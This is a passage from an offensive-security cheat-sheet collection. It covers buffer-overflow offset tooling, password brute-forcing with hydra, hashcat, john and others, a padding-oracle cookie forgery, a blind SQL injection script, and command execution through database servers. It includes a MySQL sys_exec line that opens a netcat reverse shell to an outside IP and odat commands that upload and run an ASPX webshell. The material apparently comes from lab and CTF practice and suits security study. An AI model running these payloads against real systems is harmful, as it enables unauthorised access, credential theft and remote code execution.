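pattern_offset.rb (added example, not the cheat sheet's or Metasploit's code).

The pattern is the sequence Aa0Aa1Aa2...Aa9Ab0...Az9Ba0... (uppercase, lowercase,
digit), so every 4-byte window is unique within the first 20280 bytes. After the
crash, the bytes that ended up in EIP (x86) or on top of the stack at RSP (x64)
are searched for in the pattern; their index is the number of bytes that sit
before the saved return address.
"""
import string
import struct
import sys

MAX_LEN = 26 * 26 * 10 * 3  # 20280 bytes before the sequence would repeat


def pattern_create(length):
    """Return the first `length` bytes of the cyclic pattern (pattern_create.rb -l <length>)."""
    if not 0 < length <= MAX_LEN:
        raise ValueError(f"length must be between 1 and {MAX_LEN}")
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)


def pattern_offset(value, bits=32):
    """Find `value` in the pattern (pattern_offset.rb -q <value>); -1 when absent.

    `value` is what the debugger shows: an int or a hex string such as
    "62413762" / "0x62413762" (a register, converted to the little-endian byte
    order it has in memory on x86/x86-64), or raw bytes copied from the stack.
    `bits` is the register width; trailing NUL bytes of a short value are dropped.
    """
    if isinstance(value, str):
        value = int(value, 16)
    if isinstance(value, int):
        needle = struct.pack("<I" if bits == 32 else "<Q", value)
        needle = needle.rstrip(b"\x00") or needle  # the pattern never contains NUL
    else:
        needle = bytes(value)
    return pattern_create(MAX_LEN).find(needle)


def overflow_payload(offset, ret_addr, bits=32, nop_sled=b"", shellcode=b""):
    """Layout once the offset is known: padding | return address | sled | shellcode.
    `ret_addr` is an int written little-endian at the width of the target."""
    fmt = "<I" if bits == 32 else "<Q"
    return b"A" * offset + struct.pack(fmt, ret_addr) + nop_sled + shellcode


if __name__ == "__main__":
    # ./pattern.py 200          -> prints a 200-byte pattern
    # ./pattern.py -q 62413762  -> prints the offset (52 for this value)
    if len(sys.argv) == 3 and sys.argv[1] == "-q":
        print(pattern_offset(sys.argv[2]))
    elif len(sys.argv) == 2:
        sys.stdout.write(pattern_create(int(sys.argv[1])).decode())
    else:
        print(f"usage: {sys.argv[0]} <length> | -q <value>")
```

On x64 pass `bits=64` and the 8 bytes found at `$rsp` (the non-canonical address never reaches RIP, so the register itself shows nothing useful); `overflow_payload` then builds the buffer with the return address in the byte order the CPU expects.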

--------------------------------------------------------------------------------
/binary_exploitation/reverse_engineering/recon.txt:
--------------------------------------------------------------------------------
Tools to gather information about a binary (https://ropemporium.com/guide.html):

Checking what type of file we are dealing with:

syntax : file <binary>

Checking protections (NX/DEP, PIE, canary, RELRO...) enabled on a binary:

syntax : rabin2 -I <binary> # apt-get install radare2
syntax : checksec --file=<binary>

Checking functions imported from shared libraries:

syntax : rabin2 -i <binary>
syntax : rabin2 -qs <binary>
syntax : readelf -s <binary>

Checking strings present in a binary:

syntax : strings <binary>
syntax : rabin2 -z <binary> # Only prints strings from the data sections (typically the ones added by the programmer, so not all the default stuff)

Disassembly of a binary:

syntax : objdump -d <binary> > <output>.asm
syntax : objdump -M <syntax> -d <binary> > <output>.asm # specify different disassembly syntax with -M flag
example: objdump -M intel -d vuln.exe > disassembly_intel.asm

Check what a binary is actually doing (library calls) via terminal output:

syntax : ltrace ./<binary>

Check function/method names of a binary:

syntax : nm <binary>

Check buffer length needed for overflow:

Step 1: dmesg -C -> clear the kernel ring buffer
Step 2: overflow the binary
Step 3: dmesg -t -> check where the crash happened (the segfault message contains the faulting ip/sp values)

Via gdb (with peda installed):
Step 1: gdb <binary>
Step 2: pattern_create <length> -> copy the resulting pattern
Step 3: run
Step 4: paste pattern when asked for input
Step 5: grab the ascii value from EIP (x86) or RSP (x64) -> on x64 a non-canonical address is never loaded into RIP, so look at what is on the stack instead
Step 6: pattern_offset <value>

Search for certain instructions (gadgets) in a binary:

syntax : ropper --file <binary> --search <gadget>
example: ropper --file ropme --search 'pop rdi; ret;'
example: ropper --file ropme --search 'mov|pop'
         # only search for mov and pop instructions
example: ropper --file ropme -b 4142436545
         # exclude bad characters (characters are in hex: 'A' -> '41')

Check essential information about a binary (mainly to find an address to write a string to):

syntax : readelf -a <binary>
syntax : readelf --sections <binary>

Check what the target section contains:
syntax : readelf -x <section> <binary>
example: readelf -x .data vuln.exe

Check permissions on sections in a binary (find a writable place to put a string):

Step 1: r2 <binary>
Step 2: aaa
Step 3: iS
--------------------------------------------------------------------------------
/bruteforce/7zCrack.sh:
--------------------------------------------------------------------------------
#!/bin/bash
# Script to crack password-protected 7zip files
# 7zip-JTR Decrypt Script
#
# Clone of JTR Decrypt Scripts by synacl modified for 7zip
# - RAR-JTR Decrypt Script - https://synacl.wordpress.com/2012/02/10/using-john-the-ripper-to-crack-a-password-protected-rar-archive/
# - ZIP-JTR Decrypt Script - https://synacl.wordpress.com/2012/08/18/decrypting-a-zip-using-john-the-ripper/

echo "7zip-JTR Decrypt Script";
if [ $# -ne 2 ]
then
    echo "Usage $0 <7z file> <wordlist>";
    exit 1;
fi
7z l "$1"

echo "Generating wordlist..."
# john --stdout applies its mangling rules to the wordlist and prints the candidates one per line
john --wordlist="$2" --rules --stdout | while read -r i
do
    echo -ne "\rTrying \"$i\" "
    # -p<pass> supplies the password, -aoa overwrites existing files without asking; 7z exits 0 only when extraction succeeded
    7z x -p"$i" "$1" -aoa >/dev/null 2>&1
    STATUS=$?
    if [ $STATUS -eq 0 ]; then
        echo -e "\rArchive password is: \"$i\""
        break
    fi
done
--------------------------------------------------------------------------------
/bruteforce/fcrackzip.txt:
--------------------------------------------------------------------------------
fcrackzip is a tool made for cracking password-protected ZIP files:

syntax : fcrackzip -u -D -p <wordlist> <file>.zip
example: fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt suspicious.zip
--------------------------------------------------------------------------------
/bruteforce/generateWordlist.txt:
--------------------------------------------------------------------------------
CAREFUL! Crunch can create very big files in the GB's very quickly. Use the -o flag with care!
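How big "very big" is can be computed before anything is written. The following is an added example, not part of the cheat sheet or of crunch/hashcat: it parses both notations used on this page (crunch -t templates and hashcat masks, including a custom -1 set) into per-position character sets, multiplies them into a keyspace and file size, and streams candidates instead of materialising them. The symbol set used for crunch's ^ placeholder is assumed to be hashcat's ?s set; crunch's real symbol set differs slightly.

```python
#!/usr/bin/env python3
"""Size a wordlist before generating it (added example, not the cheat sheet's own code).

Both notations on this page are parsed into one per-position character-set list:
  crunch -t templates  : @ lower, , upper, % digit, ^ symbol, anything else literal
  hashcat masks        : ?l ?u ?d ?s ?a, ?? for a literal '?', ?1 for a custom set
keyspace() is the number of candidates crunch -o / hashcat --stdout would write and
estimate_bytes() the resulting file size. generate() streams candidates lazily.
The symbol set for crunch's ^ is assumed to equal hashcat's ?s (an assumption).
"""
import itertools
import string

SPECIALS = " !\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~"  # hashcat's ?s (33 characters)
HASHCAT_SETS = {
    "l": string.ascii_lowercase,
    "u": string.ascii_uppercase,
    "d": string.digits,
    "s": SPECIALS,
    "a": string.ascii_lowercase + string.ascii_uppercase + string.digits + SPECIALS,
}
CRUNCH_SETS = {"@": HASHCAT_SETS["l"], ",": HASHCAT_SETS["u"], "%": HASHCAT_SETS["d"], "^": SPECIALS}


def expand_charset(spec, custom=None):
    """Expand a hashcat charset spec such as '?d?s' or 'abc?d' into one de-duplicated string."""
    custom = custom or {}
    out = []
    i = 0
    while i < len(spec):
        if spec[i] == "?" and i + 1 < len(spec):
            key = spec[i + 1]
            if key == "?":
                out.append("?")
            elif key in HASHCAT_SETS:
                out.append(HASHCAT_SETS[key])
            elif key in custom:
                out.append(expand_charset(custom[key], custom))  # -1 ?d?s -> ?1
            else:
                raise ValueError(f"unknown charset ?{key}")
            i += 2
        else:
            out.append(spec[i])
            i += 1
    return "".join(dict.fromkeys("".join(out)))  # keep first-occurrence order, drop duplicates


def parse_mask(mask, custom=None):
    """Per-position charsets for a hashcat mask; literal characters become one-element sets."""
    sets = []
    i = 0
    while i < len(mask):
        if mask[i] == "?" and i + 1 < len(mask):
            sets.append(expand_charset(mask[i:i + 2], custom))
            i += 2
        else:
            sets.append(mask[i])
            i += 1
    return sets


def parse_crunch(template):
    """Per-position charsets for a crunch -t template such as '@@,%'."""
    return [CRUNCH_SETS.get(c, c) for c in template]


def keyspace(sets):
    """Number of candidates for a fixed-length template."""
    total = 1
    for s in sets:
        total *= len(s)
    return total


def keyspace_range(charset, min_len, max_len):
    """Candidates for 'crunch <min> <max> <charset>': every length from min to max."""
    n = len(set(charset))
    return sum(n ** k for k in range(min_len, max_len + 1))


def estimate_bytes(sets):
    """Bytes written to the output file: one candidate plus a newline per line."""
    return keyspace(sets) * (len(sets) + 1)


def generate(sets):
    """Stream candidates in crunch's order (rightmost position varies fastest)."""
    for combo in itertools.product(*sets):
        yield "".join(combo)


if __name__ == "__main__":
    cases = (("-t @@,%", parse_crunch("@@,%")),
             ("?u?l?l?l?l?l?l?d", parse_mask("?u?l?l?l?l?l?l?d")),
             ("-1 ?d?s EvilCorp?1?d", parse_mask("EvilCorp?1?d", {"1": "?d?s"})))
    for label, sets in cases:
        print(f"{label:24} {keyspace(sets):>15,} candidates, ~{estimate_bytes(sets) / 2**20:,.1f} MiB")
    print("crunch 1 6 abcdABCDE    ", keyspace_range("abcdABCDE", 1, 6), "candidates")
    print("first of EvilCorp?1?d:  ", list(itertools.islice(generate(cases[2][1]), 3)))
```

The 8-character policy mask from the hashcat section below (?u?l?l?l?l?l?l?d) is about 80 billion candidates, roughly 670 GiB as a file; that is why masks are fed to hashcat directly (-a 3) and only short ones are written out with --stdout or crunch -o.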

Use crunch to generate wordlists:

syntax : crunch <min length> <max length> <charset>
example: crunch 1 6 abcdABCDE

syntax : crunch <min length> <max length> -t <template>
example: crunch 1 3 -t @@,%

@ will insert lower case characters
, will insert upper case characters
% will insert numbers
^ will insert symbols


Use crunch to generate a wordlist from existing character sets (check the file for possible character sets):

syntax : crunch <min length> <max length> -f <charset file> <charset name> -o <output file>
example: crunch 1 4 -f /usr/share/crunch/charset.lst lalpha -o dictionary.txt

--------------------------------------------------------------------------------
/bruteforce/hashcat.txt:
--------------------------------------------------------------------------------
Cracking hashes with hashcat, check the numbers for hashtype on the internet: (https://hashcat.net/wiki/doku.php?id=example_hashes)
Get hashtypes: hashcat --example-hashes | less
syntax : hashcat -m <hashtype> -a <attack mode> -o <output file> <hashfile> <wordlist> (--remove) --force
example: hashcat -m 5600 -a 0 -o cracked.txt ntlm2Hash.txt /usr/share/wordlists/rockyou.txt --force
OR
syntax : hashcat -m <hashtype> -o <output file> <hashfile> <wordlist> --force
example: hashcat -m 13100 -o cracked.txt adminHash.txt /usr/share/wordlists/rockyou.txt --force
# --force ignores hashcat's warnings (e.g. about running on a VM without a proper OpenCL driver); leave it out if it is not needed

Cracking hashes with hashcat where salt and hash were found separately:
Step 1: We have found hash: 62def2866337f08cc14bab43bb14e6f7 and salt: 5a569ef575066807
Step 2: We know that this is an MD5 hash, so we save the hash in 'hash.txt' like this: 62def2866337f08cc14bab43bb14e6f7:5a569ef575066807
Step 3: hashcat -m 20 -o cracked.txt hash.txt /usr/share/wordlists/rockyou.txt --force
# -m 20 is md5($salt.$pass); if the application appends the salt instead, use -m 10 (md5($pass.$salt)) with the same hash:salt file

Generate a wordlist with hashcat's bruteforce (mask) mode:
syntax : hashcat --stdout -a 3 <mask> | tee <output file> # hashcat -h -> look for charset
example: hashcat --stdout -a 3 secret1?d?s | tee wordlist.txt

Crack hashes with a mask attack (we know the password policy is one uppercase letter, 8 min length and one digit):
Check hashcat -h for the built-in charsets and use them accordingly (?l = a-z, ?u = A-Z, ?d = 0-9, ?s = special characters, ?a = all of them):
syntax : hashcat -a 3 -m <hashtype> <hashfile> <mask>
example: hashcat -a 3 -m 1000 ntlm.txt ?u?l?l?l?l?l?l?d

What if the end of the password could be either a number or a special character:
syntax : hashcat -a 3 -m <hashtype> <hashfile> -1 <custom charset> <mask>
example: hashcat -a 3 -m 1000 ntlm.txt -1 ?d?s ?u?l?l?l?l?l?l?1
# ?1 here is our custom charset (?d?s)
example: hashcat -a 3 -m 1000 ntlm.txt -1 ?d?s EvilCorp?1?d

extra info: '-m' specifies which hash-type it is, '-a' specifies what kind of attack we need (0 is a dictionary attack, 3 a mask attack), all hashes to be cracked should be in the 'hashFile'
if needed, add the '--remove' flag to remove the hashes from the 'hashFile' once they have been cracked
--------------------------------------------------------------------------------
/bruteforce/hydra.txt:
--------------------------------------------------------------------------------
Hydra is an all-round bruteforcing tool used on multiple different services

Extra options:
-f: Stop on the first correct combination
-V: Verbose (print all combinations)
-u: When using a userlist, this option tries one password on every user,
    before moving on to the next password. Default tries all passwords
    for one user, before moving on to the next user. (-u is the safer choice against account lockout policies)

Hydra bruteforce on a web directory that requires authentication through a popup form (basic authorization header):

syntax : hydra -V -f -l/-L <user/userlist> -p/-P <password/wordlist> <ip> http-get <path>
example: hydra -V -f -l admin -P /usr/share/wordlists/rockyou.txt 10.13.38.11 http-get /admin


Hydra bruteforce on an html login form (use burp-suite to check the <post parameters> and the <failure string>):

syntax : hydra -V -l/-L <user/userlist> -p/-P <password/wordlist> <ip> http-post-form "<path>:<post parameters>:<failure string>"
example: hydra -V -f -l Tyrone -P /usr/share/wordlists/rockyou.txt 10.12.15.153 http-post-form "/moodle/login/index.php:username=^USER^&password=^PASS^:Invalid login, please try again!"
example: hydra -V -f -l Tyrone -P /usr/share/wordlists/rockyou.txt 10.12.15.153 http-get-form "/moodle/login/index.php:username=^USER^&password=^PASS^:Invalid login, please try again!"


# With JSON POST data, different port, and headers

syntax : hydra -V -f -s <port> -l/-L <user/userlist> -p/-P <password/wordlist> <ip> http-post-form "<path>:<json body>:<failure string>:H=<header>:H=<header>"
example: hydra -V -f -s 8081 -l admin -P /usr/share/wordlists/rockyou.txt 10.13.38.19 http-post-form "/artifactory/ui/auth/login?_spring_security_remember_me=false:{\"user\"\:\"^USER^\",\"password\"\:\"^PASS^\",\"type\"\:\"login\"}:Username or password are incorrect:H=Accept: application/json, text/plain, */*:H=Accept-Language: en-US,en;q=0.5:H=Accept-Encoding: gzip, deflate:H=Content-Type: application/json:H=Request-Agent: artifactoryUI:H=serial: 16:H=X-Requested-With: artUI"
# the colons inside the JSON body are escaped as \: so hydra does not read them as field separators

Hydra bruteforce on an oracle tns listener (default port 1521):

syntax : hydra -V -f -P <wordlist> -t <tasks> -s <port> <ip> oracle-listener
example: hydra -V -f -P /usr/share/wordlists/rockyou.txt -t 32 -s 1521 11.12.10.82 oracle-listener


Hydra bruteforce to crack ssh credentials:

syntax : hydra -l/-L <user/userlist> -p/-P <password/wordlist> ssh://<ip>
example: hydra -V -f -L userlist.txt -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.7


Hydra bruteforce to crack rdp credentials:

syntax : hydra -V -f -l/-L <user/userlist> -p/-P <password/wordlist> rdp://<ip>
example: hydra -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://10.5.12.3

--------------------------------------------------------------------------------
/bruteforce/john.txt:
--------------------------------------------------------------------------------
John is a very popular password cracking tool


To crack a passphrase-protected private SSH key with John:

Step 1: /opt/JohnTheRipper/run/ssh2john.py <id_rsa> > <hashfile>
Step 2: john --wordlist=/usr/share/wordlists/rockyou.txt <hashfile>


To crack a unix shadow file:

Step 1: unshadow passwd.txt shadow.txt > <unshadowed file>
Step 2: john --wordlist=/usr/share/wordlists/rockyou.txt <unshadowed file>
Step 3: john --show <unshadowed file>


Check for passwords to crack in zip files:

Step 1: zip2john <file>.zip > <hashfile>
Step 2: john -w:<wordlist> <hashfile>
Step 3: john --show <hashfile>
Step 4: 7z x <file>.zip


Crack a keepass database (with a key file) with john:

Step 1: keepass2john -k key.png secrets.kdbx > secrets.hash
Step 2: john -w:<wordlist> secrets.hash
Step 3: john --show secrets.hash


To crack an encrypted SSH key with John (DES-EDE3-CBC):

Step 1: sshng2john.py <id_rsa> > <hashfile>
Step 2: crack the resulting file as above...
--------------------------------------------------------------------------------
/bruteforce/openssl.txt:
--------------------------------------------------------------------------------
'bruteforce-salted-openssl' is a bruteforcing tool to crack files encrypted with 'openssl enc' (the "Salted__" format).


syntax : bruteforce-salted-openssl -t <threads> -f <wordlist> -c <cipher> -d <digest> <encrypted file>
example: bruteforce-salted-openssl -t 15 -f /usr/share/wordlists/rockyou.txt -c aes-256-cbc -d sha256 pass_enc.txt
--------------------------------------------------------------------------------
/bruteforce/padbusterCookie.txt:
--------------------------------------------------------------------------------
padbuster is a tool that can decrypt (and forge) CBC-encrypted cookies by using a 'padding oracle' attack; it needs the url, the encrypted sample, the block size and the cookies to send:

syntax : padbuster <url> <encrypted sample> <block size> -cookies "<cookies>"
example: padbuster http://docker.website.com/profile.php NuXFiQ1LQh%2FAHvp3mC4oPSwTf9dnWmWRd%2B7HinimmStKA6hpR4dyyw%3D%3D 8 -cookies "suspicious=NuXFiQ1LQh%2FAHvp3mC4oPSwTf9dnWmWRd%2B7HinimmStKA6hpR4dyyw%3D%3D;PHPSESSID=hbbcjl7pg3pp25qlm15jlu6pf5"

Then after we find the format of the cookie, we put the value we want encrypted at the end as '-plaintext':

padbuster http://docker.website.com/profile.php NuXFiQ1LQh%2FAHvp3mC4oPSwTf9dnWmWRd%2B7HinimmStKA6hpR4dyyw%3D%3D 8 -cookies "suspicious=NuXFiQ1LQh%2FAHvp3mC4oPSwTf9dnWmWRd%2B7HinimmStKA6hpR4dyyw%3D%3D;PHPSESSID=hbbcjl7pg3pp25qlm15jlu6pf5" -plaintext '{"user":"nomad","role":"admin"}'
--------------------------------------------------------------------------------
/bruteforce/password-spray.txt:
--------------------------------------------------------------------------------
All kinds of tools to use for online password spraying

Use atomizer to bruteforce email accounts (https://github.com/byt3bl33d3r/SprayingToolkit):
syntax : atomizer.py <owa|lync> <target> <password> <userlist>
example: atomizer.py owa mail.ecorp.io Washington2020 emails.txt

syntax : atomizer.py <owa|lync> <target> <password list> <userlist> --interval <h:m:s>
example: atomizer.py owa mail.ecorp.io passwords.txt emails.txt --interval 0:0:1
# after trying a password for all emails in the list, wait one second and then
continue with the next password
--------------------------------------------------------------------------------
/bruteforce/patator.txt:
--------------------------------------------------------------------------------
Patator is a multi-purpose bruteforcing tool

patator for SSH bruteforce

syntax : patator ssh_login host=<ip> port=<port> user=<user> password=FILE0 0=<wordlist> persistent=0 -x ignore:mesg='<failure message>'
example: patator ssh_login host=10.12.32.41 port=26478 user=tyrone password=FILE0 0=/opt/SecLists/Passwords/probable-v2-top1575.txt persistent=0 -x ignore:mesg='Authentication failed.'
--------------------------------------------------------------------------------
/bruteforce/pdfCrack.txt:
--------------------------------------------------------------------------------
pdfcrack is a tool made for cracking password-protected PDF files:

syntax : pdfcrack -f '<file>.pdf' -w <wordlist>
example: pdfcrack -f 'creditcards.pdf' -w /usr/share/wordlists/rockyou.txt
--------------------------------------------------------------------------------
/bruteforce/rdp.txt:
--------------------------------------------------------------------------------
Use ncrack to bruteforce remote desktop credentials:

# -f: stop after 1 found credential, ',CL=1' = one connection at a time

syntax : ncrack -v -f --user <user> -P <wordlist> rdp://<ip>,CL=1
example: ncrack -v -f --user administrator -P /usr/share/wordlists/rockyou.txt rdp://10.132.12.3,CL=1
--------------------------------------------------------------------------------
/certificates/generateCA.txt:
--------------------------------------------------------------------------------
Use openssl to generate a key pair and a certificate signing request, then have it signed by a CA (https://gist.github.com/Soarez/9688998)

Step 1  : openssl genrsa -out <name>.key 2048
Optional: openssl rsa -in <name>.key -pubout -out <name>.pubkey # generate public key from private key
Step 2  : openssl req -new -key <name>.key -out <name>.csr # generate a CSR (Certificate Signing Request)
Step 3  : Submit the '<name>.csr' file to an 'Active Directory Certificate Service' # this is how you get the '.cer' file
--------------------------------------------------------------------------------
/certificates/openssl.txt:
--------------------------------------------------------------------------------
Openssl is a tool for various cryptography functions


Use openssl to convert a cert and key to a PKCS12 file:

syntax : openssl pkcs12 -export -out <name>.p12 -in <certificate> -inkey <private key>
example: openssl pkcs12 -export -out capsule_corp.p12 -in capsule.cert.pem -inkey capsule.key.pem
--------------------------------------------------------------------------------
/databases/nosql/mongo/mongo.txt:
--------------------------------------------------------------------------------
MongoDB is a no-sql database

Install mongo on kali (https://docs.mongodb.com/v3.0/tutorial/install-mongodb-on-linux/) :

Step 1: curl -O https://fastdl.mongodb.org/linux/mongodb-linux-x86_64-3.0.15.tgz
Step 2: tar -zxvf mongodb-linux-x86_64-3.0.15.tgz


Use mongo to connect to a remote server:

syntax : mongo -u <user> -p <password> <ip>:27017/<database>
example: mongo -u daryl -p Cr055BoW 10.10.23.41:27017/clients


Use mongo to connect to a local server with creds (a bare -p at the end of the command prompts for the password):

syntax : mongo <database> -u <user> -p
example: mongo clients -u aladeen -p
--------------------------------------------------------------------------------
/databases/sql/blindSqli.py:
--------------------------------------------------------------------------------
#!/usr/bin/python3

# Based on Ippsec's video of hackthebox 'Falafel' (https://www.youtube.com/watch?v=CUbWpteTfio)

# for ((i=32;i<127;i++)) do printf "\\$(printf %03o "$i")"; done; printf "\n" -> print all characters of the ascii table

import requests

postUrl = 'http://10.10.10.73/login.php'
chars = '0123456789abcdefghijklmnopqrstuvwxyz'

# This is the message we want to see for a successful injection: the login fails with 'Wrong identification'
# when the injected condition is true and with a different message when it is false
errorMsg = 'Wrong identification'

# Build the injected username: the condition compares one character of the admin password
def doSqli(index, character):
    return f"admin' and substr(password,{index},1) = '{character}'-- -"
###

for i in range(1,150):
    found = False
    for c in chars:
        sqli = doSqli(i, c)

        # The post parameters
        payload = {'username':sqli, 'password':'admin'}

        # The actual POST request
        r = requests.post(postUrl, data = payload)

        if errorMsg in r.text:
            print(c, end='', flush=True)
            found = True
            break
    ###

    # No character matched at this position: we have run past the end of the password
    if not found:
        break
###

###
###
print()
--------------------------------------------------------------------------------
/databases/sql/blindSqli.txt:
--------------------------------------------------------------------------------
Blind SQL Injection attack steps, tested on mysql (start from -> http://vulnsite.com/clients.php?id=150):

# Important note! For SQL injection comments (--) to work, you need to include a space at the end (-- ) or (-- -)

Step 1: id=150' -> error is not visible, so try blind injection
Step 2: id=150 and 1=1-- - -> same output? Try (id=150 and 1=2-- -) -> if this gives no output anymore, you have a sql injection
Step 3: id=150 or sleep(5)-- - -> page takes longer than 5 seconds to load, then you have a sql injection

Step 4: enumeration phase -> We use 'if' statements with 'sleep' to see what data exists and what doesn't (there are scripts for this)
# Say that we know '@@version' returns 'mysql 3.5.0', then we can do a test to see if our enumeration query works
# So we can do 'select if(mid(@@version,1,1) = 'm', sleep(5), 0)', this sleeps for 5 seconds if the first character returned is 'm'
# If this query takes 5+ seconds to run, it means it's true
--------------------------------------------------------------------------------
/databases/sql/mssql/mssql.txt:
--------------------------------------------------------------------------------
Useful commands for pentesting Microsoft SQL Server instances:

# Get current database
example: SELECT DB_NAME();

# Get all databases
example: SELECT name FROM master..sysdatabases;

# Show all tables of current database
example: select * from information_schema.tables;

# Show all columns of table
syntax : select * from information_schema.columns where table_name = '<table>';

# Show all users
example: use master; select * from sys.syslogins;

# Show a login's password hash (requires CONTROL SERVER permission)
syntax : select loginproperty('<login>', 'PasswordHash');

# Create user
syntax : exec master..sp_addlogin <user>, <password>;
syntax : create login <user> with password='<password>';

# Select users with sysadmin rights
example: select loginname from syslogins where sysadmin = 1;

# Check if current user is in given role
syntax : select is_srvrolemember('<role>');
example: select is_srvrolemember('sysadmin');

# Add user to certain role
syntax : exec sp_addsrvrolemember '<user>', '<role>';
example: exec sp_addsrvrolemember 'developer', 'sysadmin';

# Enable xp_cmdshell to execute commands on the underlying system
Step 1(host): EXEC SP_CONFIGURE 'show advanced options', 1
Step 2(host): reconfigure
Step 3(host): go
Step 4(host): EXEC SP_CONFIGURE 'xp_cmdshell', 1
Step 5(host): reconfigure
Step 6(host): go

Optional step 7(host): xp_cmdshell 'whoami'
Optional step 8(host): go

# Check linked servers and execute commands on them
Step 1 : sp_linkedservers
# select * from master..sysservers
Step 2 : EXECUTE('<query>') AT "<linked server>"
example: EXECUTE(' select * from information_schema.tables where table_schema = ''secrets'' ') AT "ECORP\SECRET_DB"
example: select * from openquery("ECORP\SECRET_DB",'select @@version')
--------------------------------------------------------------------------------
/databases/sql/mssql/mssqlclient.txt:
--------------------------------------------------------------------------------
Connect to a remote mssql instance using Impacket's mssqlclient:

syntax : python mssqlclient.py '<user>:<password>'@<ip> (-windows-auth)
example: python /opt/Impacket/examples/mssqlclient.py 'Administrator:L0cal4dm1N'@10.15.15.15 -windows-auth
--------------------------------------------------------------------------------
/databases/sql/mssql/sqsh.txt:
--------------------------------------------------------------------------------
SQL interactive shell to connect with SQL server:

syntax : sqsh -S <ip> -U <user> -P <password>
example: sqsh -S 10.12.12.32 -U sa -P MyP4ssW0RD


Enable xp_cmdshell to execute system commands (https://www.youtube.com/watch?v=l-wzBhc9wFc 26:22):

Step 1(host): EXEC SP_CONFIGURE 'show advanced options', 1
Step 2(host): reconfigure
Step 3(host): go
Step 4(host): EXEC SP_CONFIGURE 'xp_cmdshell', 1
Step 5(host): reconfigure
Step 6(host): go

Optional step 7(host): xp_cmdshell 'whoami'
Optional step 8(host): go

--------------------------------------------------------------------------------
/databases/sql/mysql.txt:
--------------------------------------------------------------------------------
Connect to a mysql instance:

syntax : mysql -u <user> -p
example: mysql -u borat -p
example: mysql -h 10.12.45.43 -u borat -p


List all tables of all databases (in mysql CLI):

example: select TABLE_SCHEMA, TABLE_NAME from information_schema.tables;


List all databases (in mysql CLI):

example: show databases;


Execute system commands:

Step 1: Check if you can actually run system commands on mysql
command: locate udf
# Check if /usr/lib/lib_mysqludf_sys.so is present

command: select * from mysql.func;
# Check if sys_exec and udf are enabled

Step 2: Execute system commands (they run as the user the mysql service runs as)

syntax : select sys_exec('<command>');
example: select sys_exec('usermod -a -G sudo john');
example: select sys_exec('usermod -u 0 john');
example: select sys_exec('nc -e /bin/sh 192.168.0.123 443');
--------------------------------------------------------------------------------
/databases/sql/oracle/cli.txt:
--------------------------------------------------------------------------------
Command line commands for the oracle cli (https://www.youtube.com/watch?v=2c7SzNo9uoA)


Basic commands:
select * from session_privs;
select table_name from user_tables;

Read a file on disk (enter after each line; 'set serveroutput on' must be active, otherwise dbms_output prints nothing):

set serveroutput on
declare
f utl_file.file_type;
s varchar(200);
begin
f := utl_file.fopen('/inetpub/wwwroot', 'iisstart.htm', 'R');
utl_file.get_line(f,s);
utl_file.fclose(f);
dbms_output.put_line(s);
end;
/

# f := utl_file.fopen('<directory>', '<file>', '<mode>');
# if the block was already run before enabling serveroutput, enter 'set serveroutput on' and then '/' to re-run it
--------------------------------------------------------------------------------
/databases/sql/oracle/odat.txt:
--------------------------------------------------------------------------------
Odat is a multi-purpose tool for oracle databases (odat -h, odat <module> -h)


Use odat to enumerate SIDs on an oracle TNS listener:

syntax : odat sidguesser -s <ip> -p <port>
example: odat sidguesser -s 10.12.32.12 -p 1521


Use odat to bruteforce passwords on an oracle TNS listener with known SID:

syntax : odat passwordguesser -s <ip> -p <port> -d <SID>
example: odat passwordguesser -s 10.10.10.82 -p 1521 -d CLIENTS
example: odat passwordguesser -s 12.12.10.82 -p 1521 -d XE --accounts-file /usr/share/odat/oracle_default_userpass.txt # or /usr/share/metasploit-framework/data/wordlists/oracle_default_userpass.txt


Use odat to upload/get files:

get privilege:
syntax : odat privesc -s <ip> -d <SID> -U <user> -P <password> --sysdba --dba-with-execute-any-procedure
example: odat privesc -s 10.12.13.42 -d CLIENTS -U tyrone -P passw0rd --sysdba --dba-with-execute-any-procedure
upload:
syntax : odat dbmsxslprocessor -s <ip> -U <user> -P <password> -d <SID> --sysdba --putFile '<remote directory>' '<remote file name>' '<local file>'
example: odat dbmsxslprocessor -s 10.12.13.42 -U tyrone -P passw0rd -d CLIENTS --sysdba --putFile 'C:\\inetpub\\wwwroot\\' 'venom.aspx' '/usr/share/webshells/aspx/cmdasp.aspx'
example: odat utlfile -s 10.12.13.42 -U tyrone -P passw0rd -d CLIENTS --sysdba --putFile C:\\inetpub\\wwwroot\\ venom.aspx /usr/share/webshells/aspx/cmdasp.aspx

get:
syntax : odat utlfile -s <ip> -U <user> -P <password> -d <SID> --sysdba --getFile <remote directory> <remote file name> <local file>
example: odat utlfile -s 10.12.13.42 -U tyrone -P passw0rd -d CLIENTS --sysdba --getFile C:\\inetpub\\wwwroot\\ venom.aspx /usr/share/webshells/aspx/cmdasp.aspx


Use odat to execute scripts/commands:

syntax : odat externaltable -s <ip> -U <user> -P <password> -d <SID> --sysdba --exec <remote directory> <executable>
example: odat externaltable -s 10.12.14.82 -U tyrone -P passw0rd -d CLIENTS --sysdba --exec C:\\inetpub\\wwwroot venom.exe
--------------------------------------------------------------------------------
/databases/sql/oracle/oscanner.txt:
--------------------------------------------------------------------------------
oscanner is used to enumerate SIDs (System Identifier), which is the database name

syntax : oscanner -s <ip> -P <port>
example: oscanner -s 10.15.10.82 -P 1521
--------------------------------------------------------------------------------
/databases/sql/oracle/sqlplus.txt:
--------------------------------------------------------------------------------
Use sqlplus to connect to an Oracle DB instance:

syntax : sqlplus <user>/<password>@<ip>:<port>/<SID>
example: sqlplus sc0tt/p4ssw0rd@45.13.14.82:1521/CLIENTS
example: sqlplus sc0tt/p4ssw0rd@45.13.14.82:1521/CLIENTS as sysdba # Kinda like sudo
--------------------------------------------------------------------------------
/databases/sql/oracle/tnscmd.txt:
--------------------------------------------------------------------------------
Use tnscmd to perform certain commands on an oracle listener (default port 1521)

syntax : tnscmd10g <command> -h <ip>
example: tnscmd10g status -h 10.12.32.41 # Error probably means it's password protected
--------------------------------------------------------------------------------
/databases/sql/postgresqlCli.txt:
--------------------------------------------------------------------------------
Use PostgreSql from command line:

syntax : psql -h <host> -d <database> -U <user> -W
